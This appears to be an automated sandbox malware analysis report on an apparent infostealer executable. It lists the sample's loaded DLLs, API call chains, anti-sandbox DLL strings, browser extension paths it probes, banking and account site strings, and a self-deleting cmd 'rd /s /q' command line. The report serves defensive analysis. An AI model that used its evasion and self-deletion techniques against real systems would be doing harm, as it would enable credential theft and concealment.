                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: ktyihkdfesf.exeStatic PE information: section name: .00cfg

                  Boot Survival

                  barindex
                  Monitors registry run keys for changes
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: ktyihkdfesf.exeBinary or memory string: DIR_WATCH.DLL
                  Source: ktyihkdfesf.exeBinary or memory string: SBIEDLL.DLL
                  Source: ktyihkdfesf.exeBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: ktyihkdfesf.exeBinary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeEvaded block: after key decisiongraph_0-14791
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-12846
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 8664Thread sleep count: 89 > 30
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00407060 FindFirstFileA,strlen,FindFirstFileA,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00410BA0 GetSystemInfo,wsprintfA,0_2_00410BA0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: XBS26P.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: XBS26P.0.drBinary or memory string: discord.comVMware20,11696487552f
                  Source: XBS26P.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: XBS26P.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000075F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000074D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: XBS26P.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: global block list test formVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: XBS26P.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: XBS26P.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: XBS26P.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: XBS26P.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: XBS26P.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: XBS26P.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: XBS26P.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: XBS26P.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: XBS26P.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: XBS26P.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: XBS26P.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@%u%SystemRoot%\system32\mswsock.dll
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeAPI call chain: ExitProcess graph end nodegraph_0-12444
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeAPI call chain: ExitProcess graph end nodegraph_0-13068
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeAPI call chain: ExitProcess graph end nodegraph_0-12446
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401170 mov eax, dword ptr fs:[00000030h]0_2_00401170
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401190 test dword ptr fs:[00000030h], 00000068h0_2_00401190
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011B0 mov eax, dword ptr fs:[00000030h]0_2_004011B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004108E0 GetProcessHeap,HeapAlloc,GetComputerNameA,0_2_004108E0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR
                  Maps a DLL or memory area into another process
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00411ED0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00411ED0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00411FA0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411FA0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_004109F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041D850 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041D850
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004108B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00410990 HeapAlloc,GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00410990
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
